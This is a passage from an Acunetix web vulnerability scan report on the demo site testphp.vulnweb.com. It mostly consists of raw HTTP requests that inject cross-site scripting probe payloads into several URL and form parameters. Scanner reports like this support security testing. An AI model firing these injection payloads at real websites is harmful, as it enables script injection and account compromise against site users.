Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/hpp/params.php
Details
URL encoded GET input p was set to valid'"()&%<acx><ScRiPt >pQkA(9519)</ScRiPt>
GET /hpp/params.php?p=valid'"()%26%25<acx><ScRiPt%20>pQkA(9519)</ScRiPt>&pp=12 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/hpp/params.php
Details
URL encoded GET input pp was set to 1'"()&%<acx><ScRiPt >uOEX(9244)</ScRiPt>
GET /hpp/params.php?aaaa=&p=1&pp=1'"()%26%25<acx><ScRiPt%20>uOEX(9244)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
Request headers
46Acunetix Website Audit
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/hpp/params.php
Details
URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >pQkA(9834)</ScRiPt>
GET /hpp/params.php?p=valid&pp=12'"()%26%25<acx><ScRiPt%20>pQkA(9834)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input artist was set to 3'"()&%<acx><ScRiPt >XjrD(9481)</ScRiPt>
GET /listproducts.php?artist=3'"()%26%25<acx><ScRiPt%20>XjrD(9481)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
Details
URL encoded GET input cat was set to 1'"()&%<acx><ScRiPt >8irV(9253)</ScRiPt>
GET /listproducts.php?artist=1&cat=1'"()%26%25<acx><ScRiPt%20>8irV(9253)</ScRiPt>
HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/listproducts.php
47Acunetix Website Audit
Details
URL encoded GET input cat was set to 4'"()&%<acx><ScRiPt >H9gs(9842)</ScRiPt>
GET /listproducts.php?cat=4'"()%26%25<acx><ScRiPt%20>H9gs(9842)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/search.php
Details
URL encoded POST input searchFor was set to the'"()&%<acx><ScRiPt >3nrK(9234)</ScRiPt>
POST /search.php?test=query HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goButton=go&searchFor=the'"()%26%25<acx><ScRiPt%20>3nrK(9234)</ScRiPt>
Request headers
/search.php
Details
URL encoded POST input searchFor was set to 1'"()&%<acx><ScRiPt >1hct(9548)</ScRiPt>
POST /search.php?test=1 HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
searchFor=1'"()%26%25<acx><ScRiPt%20>1hct(9548)</ScRiPt>
Request headers
/secured/newuser.php
Details
URL encoded POST input uaddress was set to 3137%20Laguna%20Street'"()&%<acx><ScRiPt >tsOc(9895)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 240
Request headers
48Acunetix Website Audit
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%2520Laguna%2520Street'"()%26%25<acx><ScRiPt%20>tsOc(9895)</S
cRiPt>&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00d
Pa%24%24w0rD&uphone=555-666-0606&urname=gdbgngto&uuname=gdbgngto
/secured/newuser.php
Details
URL encoded POST input ucc was set to 4111111111111111'"()&%<acx><ScRiPt >tsOc(9901)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111'"()%26%25<acx><ScRiPt
%20>tsOc(9901)</ScRiPt>&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%2
4%24w0rD&uphone=555-666-0606&urname=mwhnckff&uuname=mwhnckff
Request headers
/secured/newuser.php
Details
URL encoded POST input uemail was set to sample%40email.tst'"()&%<acx><ScRiPt >tsOc(9674)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%2540ema
il.tst'"()%26%25<acx><ScRiPt%20>tsOc(9674)</ScRiPt>&upass=g00dPa%24%24w0rD&upass2=g00dPa
%24%24w0rD&uphone=555-666-0606&urname=oujmfbim&uuname=oujmfbim
Request headers
/secured/newuser.php
49Acunetix Website Audit
Details
URL encoded POST input uphone was set to 555-666-0606'"()&%<acx><ScRiPt >tsOc(9182)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606'"()%26%25<acx><S
cRiPt%20>tsOc(9182)</ScRiPt>&urname=fkwnuyex&uuname=fkwnuyex
Request headers
/secured/newuser.php
Details
URL encoded POST input urname was set to fkwnuyex'"()&%<acx><ScRiPt >tsOc(9996)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=fkwnuyex'
"()%26%25<acx><ScRiPt%20>tsOc(9996)</ScRiPt>&uuname=pgcxsuui
Request headers
/secured/newuser.php
Details
URL encoded POST input uuname was set to pgcxsuui'"()&%<acx><ScRiPt >tsOc(9290)</ScRiPt>
POST /secured/newuser.php HTTP/1.1
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
50Acunetix Website Audit
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=unwljifb&
uuname=pgcxsuui'"()%26%25<acx><ScRiPt%20>tsOc(9290)</ScRiPt>
/userinfo.php
Details
URL encoded POST input uaddress was set toSELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES'"()&%<acx><ScRiPt >fIR5(9325)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%2520*%250d%250a%2520FROM%2520INFORMATION_SCHEMA.TABLES'"()
%26%25<acx><ScRiPt%20>fIR5(9325)</ScRiPt>&ucc=1234-5678-2300-9000&uemail=ccccc%40gmail.c
om&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uaddress was set to SELECT * FROMINFORMATION_SCHEMA.TABLES'"()&%<acx><ScRiPt >rFLf(9636)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES'"()%26%25<acx><ScRiPt%20>rF
Lf(9636)</ScRiPt>&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=update&u
phone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input ucc was set to 1234-5678-2300-9000'"()&%<acx><ScRiPt >rFLf(9972)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Request headers
51Acunetix Website Audit
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000'"()%26%25<acx><ScRiPt%20>rFLf(9972)</S
cRiPt>&[email protected]&uname=1&update=update&uphone=test&urname=test
/userinfo.php
Details
URL encoded POST input ucc was set to 1234-5678-2300-9000'"()&%<acx><ScRiPt >fIR5(9760)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000'"()%26%25<acx><ScRiPt%20>fIR5(9760)</ScRiPt>&uemail=ccccc%40gmail.com&uphone=
test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uemail was set to [email protected]'"()&%<acx><ScRiPt >rFLf(9503)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=ccccc%40gmail.com'"()%26%25<acx
><ScRiPt%20>rFLf(9503)</ScRiPt>&uname=1&update=update&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uemail was set to ccccc%40gmail.com'"()&%<acx><ScRiPt >fIR5(9131)</ScRiPt>
POST /userinfo.php HTTP/1.1
Request headers
52Acunetix Website Audit
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%2540gmail.com'"()%26%25<acx><ScRiPt%20>fIR5(9131)</ScRiPt>&uphon
e=test&urname=test
/userinfo.php
Details
URL encoded POST input uphone was set to test'"()&%<acx><ScRiPt >rFLf(9677)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=test'"()%26%25<acx><ScRiPt%20>rFLf(9677)</ScRiPt>&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uphone was set to test'"()&%<acx><ScRiPt >fIR5(9389)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=ccccc%40gmail.com&uphone=test'"()%26%25<acx><ScRiPt%20>fIR5(9389)</ScR
iPt>&urname=test
Request headers
53Acunetix Website Audit
/userinfo.php
Details
URL encoded POST input urname was set to test'"()&%<acx><ScRiPt >rFLf(9321)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=
update&uphone=test&urname=test'"()%26%25<acx><ScRiPt%20>rFLf(9321)</ScRiPt>
Request headers
/userinfo.php
Details
URL encoded POST input urname was set to test'"()&%<acx><ScRiPt >fIR5(9535)</ScRiPt>
POST /userinfo.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
